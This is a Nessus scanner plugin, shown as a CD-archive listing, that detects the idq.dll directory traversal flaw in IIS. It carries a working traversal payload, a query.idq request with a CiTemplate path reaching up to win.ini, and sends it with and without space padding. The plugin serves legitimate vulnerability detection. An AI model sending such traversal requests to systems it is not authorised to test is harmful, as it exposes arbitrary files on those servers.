home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / idq_dll.nasl < prev    next >
Text File  |  2005-01-14  |  3KB  |  109 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10115);
  10.  script_bugtraq_id(968);
  11.  script_version ("$Revision: 1.15 $");
  12.  script_cve_id("CAN-2000-0126");
  13.  name["english"] = "idq.dll directory traversal";
  14.  name["francais"] = "idq.dll directory traversal";
  15.  script_name(english:name["english"], francais:name["francais"]);
  16.  
  17.  desc["english"] = "
  18. There is a vulnerability in idq.dll which allows any remote
  19. user to read any file on the target system by doing the request :
  20.  
  21.     GET http://target/query.idq?CiTemplate=../../../somefile.ext
  22.     
  23.  
  24. Solution : Microsoft's webhits.dll addresses some of this
  25.            issue. It is available at :
  26.        http://www.microsoft.com/downloads/release/asp?ReleaseID=17727
  27.  
  28. Risk factor : High
  29. Bugtraq ID : 968";
  30.  
  31.  desc["francais"] = "
  32. Il existe une vulnΘrabilitΘ dans idq.dll qui permet α n'importe quel
  33. utilisateur de lire n'importe quel fichier  sur le site distant en
  34. faisant la requete :
  35.  
  36.     GET http://target/query.idq?CiTemplate=../../../somefile.ext
  37.  
  38. Solution : webhits.dll, de Microsoft, corrige ce problΦme. Il est
  39.            disponible α :
  40.        http://www.microsoft.com/downloads/release/asp?ReleaseID=17727
  41.  
  42. Facteur de risque : ElevΘ
  43. Bugtraq ID : 968";
  44.  
  45.  script_description(english:desc["english"], francais:desc["francais"]);
  46.  
  47.  summary["english"] = "Attempts to read an arbitrary file";
  48.  summary["francais"] = "Essaye de lire un fichier arbitraire";
  49.  
  50.  script_summary(english:summary["english"], francais:summary["francais"]);
  51.  
  52.  script_category(ACT_GATHER_INFO);
  53.  
  54.  
  55.  script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison",
  56.         francais:"Ce script est Copyright (C) 2000 Renaud Deraison");
  57.  family["english"] = "CGI abuses";
  58.  family["francais"] = "Abus de CGI";
  59.  script_family(english:family["english"], francais:family["francais"]);
  60.  script_dependencie("find_service.nes", "http_version.nasl", "www_fingerprinting_hmap.nasl");
  61.  script_require_ports("Services/www", 80);
  62.  exit(0);
  63. }
  64.  
  65. #
  66. # The script code starts here
  67. #
  68.  
  69. include("http_func.inc");
  70. port = get_http_port(default:80);
  71.  
  72.  
  73. sig = get_kb_item("www/hmap/" + port + "/description");
  74. if ( sig && "IIS" >!< sig ) exit(0);
  75.  
  76.  
  77. if(get_port_state(port))
  78. {
  79.  
  80.  base = "/query.idq?CiTemplate=../../../../../winnt/win.ini";
  81.  
  82.  req1 = http_get(item:base, port:port);
  83.  req2 = http_get(item:string(base, crap(data:"%20", length:300)), port:port);
  84.  
  85.  
  86.  soc = http_open_socket(port);
  87.  if(soc)
  88.  {
  89.   send(socket:soc, data:req1);
  90.   r = http_recv(socket:soc);
  91.   http_close_socket(soc);
  92.   if("[fonts]" >< r)
  93.   {
  94.    security_hole(port);
  95.    exit(0);
  96.   }
  97.   soc2 = http_open_socket(port);
  98.   if(!soc2)exit(0);
  99.   send(socket:soc2, data:req2);
  100.   r2 = http_recv(socket:soc2);
  101.   http_close_socket(soc2);
  102.   if("[fonts]" >< r2)
  103.   {
  104.    security_hole(port);
  105.    exit(0);
  106.   }
  107.  }
  108. }
  109.